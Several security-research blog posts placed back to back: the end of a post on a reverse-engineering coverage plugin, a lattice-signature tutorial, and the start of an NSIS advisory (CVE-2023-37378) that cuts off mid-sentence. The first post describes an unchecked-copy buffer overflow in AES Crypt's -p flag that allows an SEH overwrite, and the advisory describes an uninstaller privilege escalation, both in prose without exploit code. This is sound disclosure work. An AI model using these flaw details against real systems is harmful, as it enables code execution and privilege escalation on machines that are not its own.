After drafting the demonstration, out of sheer curiosity, I decided to analyze the compiled Windows executable for AES Crypt just so I could see the differences between the two. However, instead of simply observing differences in their execution, I ended up discovering a previously-unreported buffer overflow vulnerability in the Windows version of AES Crypt.

First, code coverage from two different runs of the program were collected using DynamoRIO: One where an incorrect password was entered at the prompt, and one where an incorrect password was specified via the -p flag.

Once code coverage data was collected, the data from both of these code coverage files was loaded into Ghidra via Cartographer, with the prompt coverage being loaded first and the -p flag coverage loaded after.

Next, in Cartographer’s Code Coverage window, the expression B - A was used to isolate the functionality that only occurs in the coverage for the -p flag. The resulting coverage showed that only 2 functions had different executions from those in the prompt coverage.

Clicking on the 1st highlighted function (FUN_004053b0) and scrolling down to around line 96 shows the following decompiled code blocks (variables renamed for readability).

As shown above, the input string passed to the -p flag is added to the buf variable (defined as char buf [1024]) character-by-character, effectively creating a form of strcpy, and as such is vulnerable to a buffer overflow due to the unchecked length of the input buffer.

By passing a specially-crafted input string to the application, it is possible to overwrite the address of the SEH handler and redirect execution to an arbitrary address in memory.

Case Study: Animal Crossing

Many gamers have fond memories of playing Animal Crossing for the Nintendo GameCube growing up, but what they may not realize that the developers left significant amounts of debug functionality within the final game.

First, code coverage data was collected starting from system boot to the point where “Press START!” appears on the screen.

Next, the main main.dol file for the game was loaded into Ghidra using the Ghidra GameCube Loader plugin. Once the executable completed auto-analysis, the code coverage data was loaded via Cartographer.

Within the boot::main function, the game version (offset 0x7 of the disk header) is checked to see if the version is 0x99, then checked twice more to see if the version is greater than 0x8F. When the 3rd condition is true, something called “ZURUMODE2” is enabled.

According to the code above, setting the 8th byte of the disk header to 0x99 should enable this “zuru mode”. When this value is set and the game is booted up, the regular Nintendo trademark screen will have significantly more information displayed, indicative of some form of debug mode being enabled.

Additionally, the game will now have debug information displayed on the screen, with various screens and displays able to be toggled by using an additional controller plugged in to the 2nd controller port.

Note: As I was typing up this part of this blog post, I came across an old PDF that I had originally stumbled upon years ago that first introduced me to this debug functionality, titled Secrets of Animal Crossing. What I didn’t know was that the author was James Chambers, a fellow colleague here at NCC Group.

I’d highly recommend checking out James’ full write-up of the inner workings of Animal Crossing’s developer mode on his blog: Reverse engineering Animal Crossing’s developer mode

Conclusion

As shown in the case studies above, Cartographer can significantly reduce the complexities of reverse engineering and help with isolating target functionality, whether it’s analyzing code being executed or code not being executed.

If you have any suggestions for improvements or ideas for features, feel free to open an issue or create a pull request on GitHub!
https://github.com/nccgroup/Cartographer

Building Intuition for Lattice-Based Signatures – Part 1: Trapdoor Signatures

Introduction

Since the first lattice-based cryptography results in [Ajtai96], lattices have become a central building block in quantum-resistant cryptosystems. Based on solving systems of linear equations, lattice-based cryptography adds size constraints or error terms to linear systems of equations, turning them into quantum-computer resistant one-way or trapdoor functions. Since the first theoretical cryptosystems of the 90’s and early 2000s, lattice-based cryptography has been a very active area of research, resulting in ever-more practical signature and encryption schemes, and yielding many advances in areas such as fully-homomorphic encryption.

This two-part blog series aims to provide some intuition on the main building blocks that are used in the construction of the two lattice-based signature schemes selected for standardization by the National Institute of Standards and Technology (NIST), Dilithium and Falcon, and showcases the techniques used in many other lattice-based constructions. This first part will describe a construction using lattice-based trapdoor functions and the hash-and-sign paradigm, which is at the core of the signature scheme Falcon. The second part will describe a construction based on the Fiat-Shamir paradigm, which is at the core of the signature scheme Dilithium.

Table of Contents

Lattice Background

Before diving into signature constructions, we must first introduce a few concepts about lattices and lattice-based hard problems.

At a high level, lattices can simply be thought of as the restriction of vector spaces to a discrete subgroup. In particular, a lattice is defined as the set of integer linear combinations of a set of basis vectors B = \{\vec{b}_1, \dots, \vec{b}_n\} \subseteq \mathbb{R}^n. For simplicity, we often restrict ourselves to integer lattices, i.e. lattices with basis vectors chosen from \mathbb{Z}^n.

Similarly to vector spaces, a lattice can be defined by an infinite number of equivalent bases. Two bases B_1 and B_2 define the same lattice if every point in the lattice generated by B_1 can also be generated as an integer linear combination of the basis B_2, and vice versa1. For example, the two-dimensional lattice \Lambda generated by B_1 = \left\{\begin{bmatrix}10\\7\end{bmatrix}, \begin{bmatrix}9\\6\end{bmatrix}\right\} can instead be generated from the basis B_2 = \left\{\begin{bmatrix}2\\-1\end{bmatrix}, \begin{bmatrix}1\\1\end{bmatrix}\right\}, as depicted below.

Note that, unlike standard vector spaces, not all linearly independent sets of n lattice vectors form a basis for a given lattice. For example, the set \left\{\begin{bmatrix}2\\-1\end{bmatrix}, \begin{bmatrix}2\\2\end{bmatrix}\right\} is not a basis for the lattice \Lambda, as there is no integer linear combination of the basis vectors that generates the vector \begin{bmatrix}3\\0\end{bmatrix}, while we can write \begin{bmatrix}3\\0\end{bmatrix} = \begin{bmatrix}2\\-1\end{bmatrix} + \begin{bmatrix}1\\1\end{bmatrix} = -6\begin{bmatrix}10\\7\end{bmatrix} + 7\begin{bmatrix}9\\6\end{bmatrix}.

Each basis B naturally corresponds to a space known as the fundamental parallelepiped, defined as the set \mathcal{P}(B) = [0,1)^n \times B = \{\vec{x}: \vec{x} = \sum_{i = 1}^n a_i\vec{b_i} \text{, such that } a_i \in [0,1) \text{ for all } i\}. Graphically, this corresponds to the n-dimensional parallelepiped with sides equal to the basis vectors, and defines a natural tiling for the space underlying the lattice. While a fundamental parallelepiped is closely tied to the basis that generated it, and is thus not unique for a given lattice, the volume enclosed by a fundamental parallelepiped is identical regardless of which lattice basis is chosen, and is thus a lattice invariant.

Some of the (conjectured) hardest computational problems over lattices are finding short vectors in an arbitrary lattice, known as the Shortest Vector Problem (SVP), and finding the lattice point closest to a target \mathbf{t} \in \mathbb{R}^n, known as the Closest Vector Problem (CVP). We can also define approximation versions of each, SVP_\gamma and CVP_\gamma, which ask to find a short vector of length up to a multiplicative approximation factor \gamma \geq 1 of the length of the shortest vector, or close vector of distance up to a multiplicative approximation factor \gamma \geq 1 of the distance of the closest vector from the target, respectively.

The effort required to solve each of the problems increases with the dimension n, and as the approximation factor gets closer to \gamma = 1. In particular, while there exist efficient algorithms for solving the SVP and the CVP for low dimension such as n=2 or for exponential approximation factors \gamma = 2^{O(n)}, the problems are NP-hard for large dimensions n and low approximation factors. Modern lattice cryptography chooses underlying problems with dimension around n = 512 and approximation factors around \widetilde{O}(n), although the exact choices of parameters for the constructions we present will be omitted from this blog post for simplicity.

Note:
Lattices can be defined over a number of various algebraic structures. They can be defined over the real numbers, such as the examples above, but are often defined over \mathbb{Z}_q, rings or modules, as those result in more efficient implementations due to the presence of additional structure within the lattice. Whether this extra structure affects the hardness of lattice problems is an open question, but to the best knowledge of the community it is not exploitable in the cryptographic settings.

In both of our examples in this blog post series, we will use one particular family of lattices known as the q-ary lattices, which are defined as follows, for some A \in \mathbb{Z}_q^{n \times m}:

\Lambda(A) = \{y \in \mathbb{Z}^m: y = A^Ts\mod{q} \text{ for } s \in \mathbb{Z}^n\}
\Lambda^\perp(A) = \{e \in \mathbb{Z}^m: Ae \equiv 0 \mod{q}\}.

These lattices are mutually orthogonal, as each consists of exactly the vectors orthogonal to all the vectors in the other one. This property is particularly useful for checking membership of a vector in a lattice: if B is a basis for \Lambda^\perp(A), then checking if x \in \Lambda(A) can be done by checking whether Bx \equiv 0 \mod{q}, and similarly checking whether y \in \Lambda^\perp(A) can be done by the check Ay \equiv 0 \mod{q}.

The more practical constructions, including the NIST submissions Falcon and Dilithium, often choose orthogonal lattices over rings or modules as the basis of their constructions. For the rest of this blog post, we will generally not go into the details of the specific rings or modules used, for simplicity, but we will mention what lattice constructions are used in practice.

Constructing Signatures Using Hash-and-Sign and CVP

The first construction for lattice-based signature schemes uses the hash-and-sign paradigm, and relies on the hardness of the CVP problem. The hash-and-sign paradigm was first introduced by Bellare and Rogaway [BR96] to construct the RSA Full Domain Hash (FDH) signature scheme, and relies on a secret trapdoor function for the construction of signatures.

The basic idea is simple: Suppose we have a trapdoor function f such that f is efficiently computable, but very hard to invert (i.e. f^{-1} is difficult to compute) without additional information. To sign a message m, we can hash m to a point t = H(m) in the range of the function f, and use the secret f^{-1} to compute the signature \sigma = f^{-1}(t). To verify a signature (m, \sigma), simply compute t' = f(\sigma) and check whether t' = H(m).

In particular, choosing the trapdoor permutation function f(\sigma) = \sigma^e \mod(N) and inverse f^{-1}(t) = t^d \mod(N) in the above set-up recovers the RSA FDH scheme.

The Hard Problem

To see how to construct a hash-and-sign trapdoor function using lattice-based primitives, consider the closest vector problem. The CVP_\gamma is a hard problem to solve2 for a random lattice, but it is easy to verify a given solution: given a target \vec{t} and a candidate solution (i.e. candidate close lattice vector) \vec{v}, it is easy to check that \vec{v} is in a given lattice, by checking whether it can be written as an integer linear combination of the basis vectors, and whether \vec{v} is within the specified distance of the target by computing |\vec{v} - \vec{t}|.

However, in order to use the CVP_\gamma to construct a trapdoor function, we need to find a way to tie the hardness of the CVP_\gamma to some secret data, i.e. ensure that a close vector can easily be found using the secret data, but is very hard to find without it. The central idea used here is the observation that not all lattice bases are created equal, and that some bases allow us to solve hard lattice problems such as CVP_\gamma more efficiently than others. Crucially, while any basis can be used to verify the correctness of a CVP_\gamma solution (as they all define the same lattice, and thus can all be used to check a candidate solution’s membership in the lattice), the quality of a CVP_\gamma solution one can find (i.e. the distance from the target, measured by the size of the \gamma factor) depends on the basis one started off with. To see why, consider the following intuitive algorithm for solving CVP_\gamma, called Babai’s round-off algorithm:

Given a basis B and a target point \vec{t}, one can use the known basis to round to a nearby lattice point as follows: write the target point as a linear combination of the basis vectors, \vec{t} = \sum_{i = 1}^n a_i \vec{b_i}. Then, round each coefficient a_i to the nearest integer, to obtain v = \sum_{i = 1}^n \lfloor a_i \rceil \vec{b_i}. These operations can be expressed as v = \lfloor B^{-1}\vec{t}\rceil B. Since any integer linear combination of lattice vectors is a lattice vector, the result \vec{v} is a lattice vector near \vec{t}, which corresponds to the nearest corner of the fundamental parallelepiped translate containing \vec{t}.

Intuitively, shorter (and more orthogonal) bases lead to more reliable results from Babai’s rounding algorithm. This can be formalized by observing that the maximum distance from the target contributed at step i is given by \|\frac{1}{2}\vec{b_i}\| (since the solution found will be at one of the corners of the containing fundamental parallelepiped), and hence by the triangle inequality the distance \|\vec{t} - \vec{v}\| is bounded by \frac{1}{2}\sum_{i=1}^n \|\vec{b_i}\|.

This can be seen in practice, by finding instances where two different bases find different solutions to the CVP_\gamma, such as when the nearest lattice point is not in the fundamental parallelepiped containing the target point. Two examples of differing solutions can be seen in the following figure:

Thus, to instantiate our trapdoor algorithm, one needs to find a good basis, that allows us to solve CVP_\gamma to within a certain bound, as well as a bad basis, that does not allow solving CVP_\gamma without significant computational costs, but still allows one to verify solutions.

Note:
One method for generating this pair of bases is to choose a “good” basis, and apply a transformation to it to obtain a “bad” basis. A common choice of “bad” basis is the Hermite Normal Form (HNF) of the lattice, as it is in a sense the worst possible basis: the same HNF can be generated from any basis of a given lattice, and thus the HNF reveals no information about the basis it was generated from.

A First Attempt

A signature scheme based on this idea was first proposed in 1997 by Goldreich Goldwasser and Halevi, known as the GGH signature scheme [GGH]. At its core, the GGH signature scheme chooses a “good” basis for its secret key, and computes a matching “bad” public basis to use for verifying.

  • To sign a message m using GGH, one maps the message to a random target point \vec{t} in the underlying space, and uses the secret (“good”) basis to find a solution \vec{v} to the CVP_\gamma with target \vec{t} using Babai’s rounding algorithm. The signature is then \vec{\sigma} = \vec{t} - \vec{v}.
  • To verify the signature \vec{\sigma}, one recomputes \vec{t} from the message m, checks that \vec{t} - \vec{\sigma} is a lattice vector using the public basis, and that \vec{\sigma} is sufficiently short (by checking that \|\vec{\sigma}\| is below some publicly known bound, chosen as part of the signature scheme parameters).

(One could equivalently define the signature as the value \vec{\sigma} = \vec{v}, and check that \vec{t} - \vec{\sigma} is short and that \vec{\sigma} is a lattice vector during verification).

The GGH signature scheme was chosen as a foundation for the original NTRUSign signature scheme, by instantiating it with a lattice defined over a special class of rings (the NTRU lattice) which allows for a much more compact representation of the underlying lattice, leading to better efficiency and smaller keys.

Breaking the GGH/NTRUSign Signature Scheme

Unfortunately, the GGH signature construction leaks information about the secret basis with every new signature. Indeed, if a secret basis B was used to generate GGH signatures (where B is represented as a matrix), each signature can be mapped to a point in the fundamental parallelepiped defined by the (secret) basis B, and thus leak information about this secret basis.

Indeed, if m is mapped to the target point \vec{t}, the nearby lattice point found is \vec{v} and the corresponding signature is \vec{\sigma}, then we can rewrite \vec{v} = \lfloor \vec{t}B^{-1}\rceil B = \left(\vec{t}B^{-1} + \vec{e}\right)B = \vec{t} + \vec{e}B, for \vec{e} \in [-1/2,1/2]^n by choice of \vec{v} and the definition of Babai’s rounding algorithm, and hence

\vec{\sigma} = \vec{t} - \vec{v} = \vec{e} \in [-1/2,1/2]^nB = \{xB: x \in [-1/2,1/2]^n \}.

This can be seen graphically in the following figure, where we see that each new message signature pair corresponds to a point in the fundamental parallelepiped defined by the basis used to generate it. The following figure plots the \vec{\sigma} = \vec{t} - \vec{v} values obtained from signatures generated using the two bases defined above:

Nguyen and Regev [NR06] showed that this method can be used to recover the secret basis with a few hundred message signature pairs, by using standard optimization techniques to recover the basis from these points in the fundamental parallelepiped.

Note:
The Nearest Planes Algorithm is an algorithm very similar to Babai’s round-off algorithm for solving CVP_\gamma that rounds based on the Gram-Schmidt vectors of the basis instead of the basis vectors themselves, and has very similar asymptotic hardness guarantees. While the GGH construction chose to use Babai’s rounding algorithm to solve CVP_\gamma, the Nearest Planes Algorithm can equivalently be used instead.

A Secure Signature Scheme Based on CVP – GPV08 Signatures

Despite the flaws in the GGH construction, the high-level idea of using a short basis as a trapdoor can still be made to work. In 2008, Gentry, Peikert and Vaikuntanathan [GPV08] showed how this lattice trapdoor framework can be adapted to create provably secure signatures.

The fundamental idea is simple: given a set of signatures \vec{\sigma}_m, we wish the distribution of these signatures to leak no information about the trapdoor function used to generate them. In particular, if the distribution of the signatures (over some fixed domain) is independent of the secret values used, no information can be leaked from the signatures using this method. Note that this was not the case with the GGH signature scheme, as the domain of the distribution was closely related to the geometry of the secret values.

Getting this to work in the lattice setting requires a slight generalization of the usual definition of trapdoor functions. A trapdoor permutation f^{-1}(t) = t^d \mod(N), used for instance in RSA FDH, defines a unique inverse for each element of the range. Choosing elements of the range of f uniformly (which could be done for instance by hashing a message to a random element of the range) thus results in a uniform distribution of signatures over to the domain of f (or range of f^{-1}) and prevents the leak of any information about the secret integer d from the distribution of the signatures.

However, if we want to base our lattice trapdoors on the hardness of CVP_\gamma, there are multiple lattice points within a fixed, relatively short distance from the target, and hence each element of the range has multiple possible preimages. One must thus ensure that the distribution over these preimages obtained during the signing process leaks no information about the inversion function. That is, we want to define a trapdoor function f: D\to R that can only be inverted efficiently using some secret data, and such that the domain D and distribution P(D) over the domain obtained by choosing a uniformly random element of the range R (e.g. by hashing a message m to an element of R) and inverting the trapdoor function (computing f^{-1}) are independent of the secret data used to compute f^{-1}.

Thus, the trapdoor inversion function f^{-1} must guarantee that the output is both correct and that it follows the correct distribution, i.e. that if \vec{\sigma}_m = f^{-1}(H(m)), we must have f( \vec{\sigma}_m) = H(m) and that the distribution of all \vec{\sigma}_m values is exactly P(D). This can be formalized using conditional distributions, i.e. by requiring that \vec{\sigma}_m is sampled from the distribution P(D), conditioned on the fact that f( \vec{\sigma}_m) = H(m). This generalized definition was formalized in [GPV08], in which the authors called functions that satisfy these properties “Preimage Sampleable Functions”.

Given such a preimage sampleable (trapdoor) function f and its inverse f^{-1}, one can define a trapdoor signature scheme in the usual way:

Sign(m):

1. Compute \vec{t} = H(m)
2. Output \vec{\sigma}_m = f^{-1}(\vec{t})

Verify(m, \vec{\sigma}_m):

1. Check that \vec{\sigma}_m is in the domain D
2. Check that f( \vec{\sigma}_m) = H(m).

Note that this definition avoids the problems with the GGH signature scheme. Indeed, if the domain D and the distribution of signatures P(D) over the domain are independent of the secret values, signatures chosen from P(D) cannot leak any information about the secret values used to compute them.

Preimage Samplable Trapdoor Functions from Gaussians

However, it is not immediately clear that such preimage samplable functions even exist, or how to compute them. In [GPV08], the authors showed that a Gaussian distribution can be used to define a family of preimage samplable functions, due to some nice properties of Gaussian distributions over lattices.

The basic intuition as to why Gaussian distributions are particularly useful in this case is that a Gaussian of sufficient width overlaid over a lattice can easily be mapped to a uniform distribution over the underlying space, and is thus a great candidate for instantiating a preimage samplable function. Indeed, consider sampling repeatedly from a Gaussian distribution centered at the origin, and reducing modulo the fundamental parallelepiped. As depicted in the following figure, the distribution that results from this process tends to the uniform distribution (over the fundamental parallelepiped) as the width of the Gaussian increases, and relatively small widths are sufficient to get close to a uniform distribution.

Thus, we can define the distribution P(D) as a (truncated) Gaussian distribution \rho_s(D) of sufficient width s, with the domain D \subset \mathbb{R}^n chosen to be an area that contains all but a negligible fraction of the Gaussian distribution \rho_s(\mathbb{R}^n)3. By the properties of the Gaussian, if \mathcal{P}(\Lambda) is the fundamental parallelepiped defined by the public basis for the lattice \Lambda, the distribution of f(\vec{x}) = \vec{x} \mod \mathcal{P}(\Lambda) will be uniform, for \vec{x} distributed as \rho_s(D).

To show that f is a preimage samplable function and use it to instantiate a signature scheme, it remains to find a method to compute f^{-1}(\vec{t}) efficiently (given some secret values), i.e. define a method for sampling \vec{\sigma} from \rho_s(D), conditioned on f(\vec{\sigma})= \vec{t}, for uniformly random targets \vec{t} \in \mathcal{P}(\Lambda). To define this sampling method, note that all vectors \vec{x} with f(\vec{x}) = \vec{x} \mod{P}(\Lambda) = \vec{t} are exactly the elements of the shifted lattice \vec{t} + \Lambda. Thus, sampling from \rho_s, conditioned on f(\vec{\sigma}) = \vec{t} is equivalent to sampling from the distribution \rho_s restricted to \vec{t} + \Lambda. In practice, this is done by sampling a lattice vector \vec{v} from the appropriate offset distribution \rho_{s,-\vec{t}\:}(\Lambda)4, and outputting \vec{t} + \vec{v}. Alternately, we can sample from \vec{w} \sim \rho_{s,\vec{t}\:}(\Lambda) and output \vec{t} - \vec{w}, since both the Gaussian distribution and the lattice \Lambda are invariant under reflection.

The final piece of the puzzle is to figure out how to sample from \rho_{s,\vec{t}}(\Lambda) efficiently. At the core of [GPV08] was a new efficient Gaussian sampler over arbitrary lattices, which is based on the observation that one can sample from the desired Gaussian distribution over a lattice, if one knows a “good” quality basis (chosen as the secret trapdoor for this scheme)5. The resultant algorithm can be thought of as a randomized version of the nearest planes algorithm, where instead of selecting the nearest plane at each step, one selects a nearby plane, according to the (discrete) Gaussian distribution over the candidate planes. In [Pei10], Peikert showed that Babai’s round-off algorithm can be similarly randomized coordinate-by-coordinate, at the cost of an extra perturbation technique to account for the skew introduced by the fact basis vectors are generally not an orthogonal set.

The output of this sampling algorithm is effectively chosen randomly from the solutions to the CVP_\gamma problem, and since the resultant signatures are distributed as a Gaussian distribution that is independent from the basis, no information about the geometry of the secret basis used by the sampler is leaked. This can be formalized by noting that by definition, we have \vec{t} - \vec{w} \in D, and hence \vec{w} \in \Lambda is at a distance of at most \|\vec{t} - \vec{w}\| \leq \|D\| from the target \vec{t}. Choosing a sufficiently small domain D as part of the definition for the signature scheme ensures \vec{w} is a solution to the CVP_\gamma problem with target \vec{t}.

Putting this all together, we can define a CVP_\gamma-based trapdoor signature scheme as follows:

Sign(m):
1. Compute \vec{t} = H(m) to be a uniformly random point in \mathcal{P}(\Lambda)
2. Compute \vec{\sigma}_m = f^{-1}(\vec{t}):
    1. Sample \vec{w} \sim \rho_{s,\vec{t}\:}(\Lambda), using the secret basis for \Lambda.
    2. Set \vec{\sigma}_m = \vec{t} - \vec{w}. Note that \vec{\sigma}_m is distributed as \rho_s(D) conditioned on f(\vec{\sigma}_m) = \vec{t}.
3. Output the signature \vec{\sigma}_m
Verify(m, \vec{\sigma}_m):
1. Check that \vec{\sigma}_m is in the domain D
2. Recompute \vec{t} = H(m), and check that f(\vec{\sigma}_m) = \vec{\sigma}_m \mod{\mathcal{P}(\Lambda)} = \vec{t} (or, equivalently, check that \vec{t} - \vec{\sigma}_m is a lattice vector, since \vec{x} \equiv \vec{0} \mod{\mathcal{P}(\Lambda)} if and only if \vec{x} \in \Lambda).

The authors of [GPV08] used this construction to define an efficient trapdoor signature scheme based on the CVP_\gamma problem in lattices. Their particular instantiation is defined over a family of lattices that allows particularly efficient operations, and thus yields an efficient signature scheme. The following section goes into details about their construction, which follows the same high-level approach as was covered here. However, it is a little more technical and can be skipped if only the high-level intuition is desired.

As a nice bonus, this lattice-based trapdoor scheme has nice provable security properties. It can be shown that the (average-case) security of this scheme can be reduced to the worst-case hardness of the well-studied hard lattice problem Shortest Independent Vector Problem (SIVP_\gamma). This is particularly nice, as the worst-case hardness of a problem is often easier to analyze than the average-case hardness (i.e. the hardness of a randomly-selected instance, such as when keys are chosen at random).

The secure trapdoor construction of [GPV08] was eventually adapted in the design of the NIST candidate Falcon, which consists of [GPV08] trapdoor signatures instantiated over a special class of compact lattices called the NTRU lattices. Falcon is the smallest of the NIST PQC finalists, when comparing the total size of public key and signature, and has very fast verification. However, the implementation of Falcon has a lot of complexity – in particular, implementing the discrete Gaussian sampler securely and in constant-time is tricky, as the reference implementation uses floating point numbers for this computation.

Details of the [GPV08] Trapdoor Signature Construction

At a high-level, the [GPV08] construction relies on instantiating the above construction over a discrete domain and range, in order to allow for more efficient computations. In particular, the construction is defined over the q-ary lattices \Lambda(A) and \Lambda^\perp(A). This is done for two reasons: first, this allows for more efficient membership verification, as checking whether x is in the q-ary lattice \Lambda^\perp(A) only requires checking whether Ax \equiv 0 \mod{q}. Second, restricting ourselves to a discrete range and domain simplifies many computations, and allows us to better formalize what it means for target points to be distributed uniformly over the range, as it is easier to map the outputs of a hash function to a discrete domain than to a continuous one.

However, working with discrete q-ary lattices requires modifying the definitions and distributions to work over this new domain and range. In particular, we define the discrete Gaussian distribution over a lattice as the discrete-domain version of the Gaussian distribution which preserves these nice properties of uniformity over the chosen discrete domain in a natural way. Specifically, a smoothing discrete Gaussian distribution can be defined over a superlattice, a finer-gridded lattice \Lambda^\prime such that \Lambda \subseteq \Lambda^\prime. The smoothing discrete Gaussian distribution over the superlattice, D_{\Lambda^\prime}, can then be defined in such a way that it results in a uniform distribution when reduced modulo the fundamental parallelepiped. Note that the range of this mapping, i.e. the set of possible values of \Lambda^\prime \mod \mathcal{P}(\Lambda) corresponds exactly to the set of cosets \Lambda^\prime\setminus \Lambda.

In particular, in the case of q-ary lattices, we can choose \Lambda^\prime = \mathbb{Z}^m and \Lambda = \Lambda^\perp(A). From the definition, we get that a sufficiently wide discrete Gaussian distribution D_{\mathbb{Z}^m} that is smoothing over the lattice \Lambda^\perp will result in a uniform distribution over the set of cosets \mathbb{Z}^m \setminus \Lambda^\perp when reduced modulo the fundamental parallelepiped \mathcal{P}(\Lambda^\perp). Additionally, we can use a correspondence between the set of cosets \mathbb{Z}^m \setminus \Lambda^\perp, and the set of syndromes6 U = \{\vec{u}: \vec{u} = A\vec{x} \text{ for some } \vec{x} \in \mathbb{Z}^m\} to show that if we sample \vec{x} \sim D_{\mathbb{Z}^m}, choosing the width so that D_{\mathbb{Z}^m} is smoothing over the lattice \Lambda^\perp, then the distribution of A\vec{x} will be uniform over the set of syndromes U.

Thus, to instantiate the secure trapdoor construction of [GPV08] with q-ary lattices, messages are mapped uniformly to the set of syndromes U, and signatures \vec{\sigma} are sampled from the (smoothing) distribution D_{\mathbb{Z}^m}, conditioned on A\vec{\sigma} being equal to the syndrome corresponding to a particular message. Finally, we can choose parameters such that we can guarantee that for almost all choices of A, U = \mathbb{Z}_q^n. Thus, messages only need to be mapped uniformly to \mathbb{Z}_q^n, which can be done in a straightforward manner using an appropriately defined hash function.

As before, sampling from the (smoothing) distribution D_{\mathbb{Z}^m}, conditioned on A\vec{\sigma} = \vec{u} can be done by mapping the syndrome back to the corresponding coset \vec{t}, sampling a lattice vector \vec{w} \in \Lambda^\perp from the shifted distribution D_{\Lambda^\perp, \vec{t}} (corresponding to sampling from D_{\mathbb{Z}^m}(\vec{t} + \Lambda^\perp)), and outputting \vec{t} - \vec{w}. Note that the vector \vec{w} is a solution to the CVP problem with lattice \Lambda^\perp and target \vec{t}. Putting everything together, we can choose f(\vec{e})  = A\vec{e} \mod{q}, and instantiate a trapdoor signature scheme as follows:

Sign(m):
1. Choose \vec{u} = H(m) \in \mathbb{Z}_q^n to be a uniformly random syndrome from U = \mathbb{Z}_q^n
2. Compute \vec{\sigma}_m = f^{-1}(\vec{u}): 
    1. Choose \vec{t} \in \mathbb{Z}^m, an arbitrary preimage such that f(\vec{t}) = A\vec{t} = \vec{u} (this can be done via 
        standard linear algebra)
    2. Sample \vec{w} \sim D_{\Lambda^\perp, \vec{t}}, the discrete Gaussian distribution over \Lambda^\perp centered at \vec{t}.  
    3. Let \vec{\sigma}_m = \vec{t} - \vec{w}.  Note that \vec{\sigma}_m is distributed as D_{\mathbb{Z}^m}, conditioned on A\vec{t} = \vec{u}.
3. Output the signature \vec{\sigma}_m. 
Verify(m, \vec{\sigma}_m):
1. Check whether \vec{\sigma}_m is contained in the domain D (in practice, this amounts to 
    checking whether \| \vec{\sigma}_m\| is sufficiently small).
2. Check whether A \vec{\sigma}_m = H(m). Note that A \vec{\sigma}_m = A(\vec{t} - \vec{w}) = A\vec{t} - A \vec{w} = \vec{u} + 0, by choice
    of \vec{t} and definition of \Lambda^\perp.

Conclusion

Lattice-based [GPV08]-style trapdoor signatures are a generalization of the classical hash-and-sign signatures paradigm, that randomizes the signing process in order to account for the existence of multiple preimages and avoid leaking information about the discrete structure of the lattice. This approach allows the resultant signatures to be very short, at the cost of some implementation complexity.

While the construction may seem intimidating at first, this write-up attempts to have made this modified lattice-based construction a little more approachable. Stay tuned for the second part of this blog post series, which will describe an alternate construction for lattice-based signatures, based on the Fiat-Shamir paradigm.

Acknowledgements


I’d like to thank Paul Bottinelli, Giacomo Pope and Thomas Pornin for their valuable feedback on earlier drafts of this blog post. Any remaining errors are mine alone.

Footnotes

1: Formally, two bases B_1 and B_2 define the same lattice if and only if there is an unimodular matrix (a square, integer matrix with determinant \pm 1, or, equivalently, an integer matrix which is invertible over the integers) U such that B_1 = UB_2.

2: For an appropriately chosen instance of the CVP_\gamma problem. Concretely, one usually chooses values around n = 512 and \gamma = \widetilde{O}(n) for cryptographic applications.

3: The exact width needed can be formalized using a quantity known as the smoothing parameter, which relates the width of a Gaussian distribution \rho_s to the distance from uniform of the reduced distribution of \rho_s \mod(\Lambda). It can be shown that relatively narrow Gaussians are sufficient to obtain a negligible distance from uniform – for instance, the lattice of integers \mathbb{Z} has a smoothing parameter of \approx 5 for \varepsilon = 2^{-128} distance from uniform. The domain D can simply be defined as all points within a certain distance from the origin, with the distance defined chosen as a small multiple of the width s, since the exponential decay of the Gaussian function means almost all of the weight is given to points near the origin.

4: The offset distribution \rho_{s, \vec{c}} is simply a Gaussian distribution of width s that is centered at the point \vec{c}, and can be defined as \rho_{s, \vec{c}}(\vec{x})  = e^{-\|\vec{x} - \vec{c}\|^2/s^2}

5: Any basis can be used to implement this sampler, but one can only sample from Gaussian distributions that are sufficiently wider than the longest vector in a known basis. One can thus choose a width such that the Gaussian still maps to the uniform distribution under f, but such that it is infeasible to sample from the Gaussian distribution without knowledge of the secret basis to instantiate the signature scheme.

6: The term syndrome comes from the terminology used for error correcting codes, due to similarities between the q-ary lattices and the error syndrome, which can be used to locate errors in linear codes. Similarly, the matrix A is sometimes called the parity-check matrix for the lattice \Lambda^\perp(A), in analogy to the parity check matrix of linear error correcting codes.

References

[Ajtai96]: M. Ajtai, Generating Hard Instances of Lattice Problems, 1996, https://dl.acm.org/doi/10.1145/237814.237838.

[NR06]: P. Nguyen and O. Regev, Learning a Parallelepiped:Cryptanalysis of GGH and NTRU Signatures, 2006, https://cims.nyu.edu/~regev/papers/gghattack.pdf.

[GPV08]: C. Gentry et al., How to Use a Short Basis:Trapdoors for Hard Lattices and New Cryptographic Constructions https://eprint.iacr.org/2007/432.pdf.

[Falcon]: P. Fouque et al., Falcon: Fast-Fourier Lattice-based Compact Signatures over NTRU, 2020, https://falcon-sign.info/falcon.pdf.

[Dilithium]: S.Bai et al., CRYSTALS-Dilithium Algorithm Specifications and Supporting Documentation (Version 3.1), 2021, https://pq-crystals.org/dilithium/data/dilithium-specification-round3-20210208.pdf.

[BR96]: M. Bellare and P. Rogaway, The Exact Security of Digital Signatures – How to Sign with RSA and Rabin, 1996, https://www.cs.ucdavis.edu/~rogaway/papers/exact.pdf.

[GGH]: O. Goldreich et al., Public-Key Cryptosystems from Lattice Reduction https://www.wisdom.weizmann.ac.il/~oded/PSX/pkcs.pdf.

[Pei10]: C. Peikert: An Efficient and Parallel Gaussian Sampler for Lattices, 2010, https://eprint.iacr.org/2010/088.pdf.

Technical Advisory – Nullsoft Scriptable Installer System (NSIS) – Insecure Temporary Directory Usage

Title: Nullsoft Scriptable Installer System (NSIS) - Insecure Temporary Directory
Usage
Vendor URL: https://nsis.sourceforge.io/Main_Page
Versions Affected: NSIS 3.08 (September 25, 2021) and below
CVE Identifier: CVE-2023-37378
Risk:
7.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
7.3 CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Author: Richard Warren <richard.warren[at]nccgroup.com>

Description

The NSIS uninstaller package did not enforce appropriate permissions on the temporary directory used during the uninstall process. Furthermore, it did not ensure that the temporary directory was removed before running executable content from it. This could potentially result in privilege escalation under certain scenarios.

Impact

A low-privileged, local attacker could exploit this vulnerability to execute arbitrary code with the privileges of the user that launched the uninstaller – potentially resulting in privilege escalation. An example of this could be a privileged Windows service that runs as SYSTEM , and runs an NSIS uninstall.exe package. A malicious user could exploit this vulnerability to gain code execution with the privileges of that service.

Technical Details

During the uninstall process, the NSIS uninstaller.exe executable creates a temporary
